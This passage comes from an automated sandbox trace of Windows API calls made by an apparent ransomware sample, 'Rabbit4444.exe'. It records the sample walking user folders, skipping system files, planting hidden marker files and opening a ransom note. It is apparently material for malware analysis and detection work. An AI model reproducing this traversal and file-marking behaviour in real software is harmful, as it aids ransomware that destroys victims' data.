lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.415] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.415] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.416] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.416] lstrlenW (lpString="desktop.ini") returned 11 [0049.416] lstrlenW (lpString="Rabbit4444") returned 10 [0049.416] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.416] lstrlenW (lpString=".dll") returned 4 [0049.416] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.416] lstrlenW (lpString=".lnk") returned 4 [0049.416] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.416] lstrlenW (lpString=".ini") returned 4 [0049.416] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.416] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="Rabbit4444.exe") returned -1 [0049.416] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0049.416] lstrcmpiW (lpString1="Links", lpString2="NTUSER.DAT") returned -1 [0049.416] lstrcpyW (in: lpString1=0x130eb6c, lpString2="Links" | out: lpString1="Links") returned="Links" [0049.416] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links", dwFileAttributes=0x10) returned 1 [0049.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0049.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x40) returned 0x114fb8 [0049.417] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf6350 [0049.417] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0049.417] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0049.417] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\favorites\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.418] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.418] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.419] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.419] CloseHandle (hObject=0x278) returned 1 [0049.419] CloseHandle (hObject=0x27c) returned 1 [0049.419] GetCurrentThreadId () returned 0xd98 [0049.419] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0049.419] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Favorites\\Links", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0049.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114fb8 | out: hHeap=0xe0000) returned 1 [0049.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0049.419] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Favorites\\Links" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0049.419] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\" [0049.419] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3" [0049.419] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\favorites\\links\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.420] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.423] FlushFileBuffers (hFile=0x27c) returned 1 [0049.424] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.424] CloseHandle (hObject=0x27c) returned 1 [0049.436] lstrlenW (lpString="C:\\Users\\FD1HVy\\Favorites\\Links") returned 31 [0049.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6c66b9f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0049.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.437] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.437] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.437] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.437] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6c66b9f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.437] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.437] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.437] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.437] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.437] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.437] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6c66b9f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6c66b9f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6c8cdc5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.437] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.437] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.437] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.437] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.437] lstrcpyW (in: lpString1=0x130eb78, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.437] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.438] lstrlenW (lpString="desktop.ini") returned 11 [0049.438] lstrlenW (lpString="Rabbit4444") returned 10 [0049.438] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.438] lstrlenW (lpString=".dll") returned 4 [0049.438] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.438] lstrlenW (lpString=".lnk") returned 4 [0049.438] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.438] lstrlenW (lpString=".ini") returned 4 [0049.438] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.438] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0049.438] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0049.438] lstrcpyW (in: lpString1=0x130eb78, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.438] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\favorites\\links\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.439] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.439] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.439] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.440] CloseHandle (hObject=0x278) returned 1 [0049.440] CloseHandle (hObject=0x27c) returned 1 [0049.440] GetCurrentThreadId () returned 0xd98 [0049.440] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0049.440] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Downloads", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0049.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102a10 | out: hHeap=0xe0000) returned 1 [0049.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0049.440] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Downloads" | out: lpString1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0049.440] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Downloads\\") returned="C:\\Users\\FD1HVy\\Downloads\\" [0049.440] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Downloads\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3" [0049.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\downloads\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.441] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.444] FlushFileBuffers (hFile=0x27c) returned 1 [0049.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.445] CloseHandle (hObject=0x27c) returned 1 [0049.445] lstrlenW (lpString="C:\\Users\\FD1HVy\\Downloads") returned 25 [0049.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.445] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe6cb3092, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0049.445] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.445] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.445] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.445] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.445] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe6cb3092, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.445] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.445] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.445] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.445] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.446] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.446] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6cb3092, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6cb3092, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6cb3092, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.446] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.446] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.446] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.446] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.446] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.446] lstrlenW (lpString="desktop.ini") returned 11 [0049.446] lstrlenW (lpString="Rabbit4444") returned 10 [0049.446] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.446] lstrlenW (lpString=".dll") returned 4 [0049.446] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.447] lstrlenW (lpString=".lnk") returned 4 [0049.447] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.447] lstrlenW (lpString=".ini") returned 4 [0049.447] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.447] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0049.447] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0049.447] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\downloads\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.447] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.447] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.447] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.447] CloseHandle (hObject=0x278) returned 1 [0049.447] CloseHandle (hObject=0x27c) returned 1 [0049.448] GetCurrentThreadId () returned 0xd98 [0049.448] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0049.448] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0049.448] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1027d0 | out: hHeap=0xe0000) returned 1 [0049.448] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0049.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents" | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0049.448] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0049.448] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3" [0049.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.449] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.452] FlushFileBuffers (hFile=0x27c) returned 1 [0049.453] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.453] CloseHandle (hObject=0x27c) returned 1 [0049.454] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents") returned 25 [0049.454] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.454] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd1aba96, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6cb3092, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0049.454] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.454] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.454] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.454] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.454] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd1aba96, 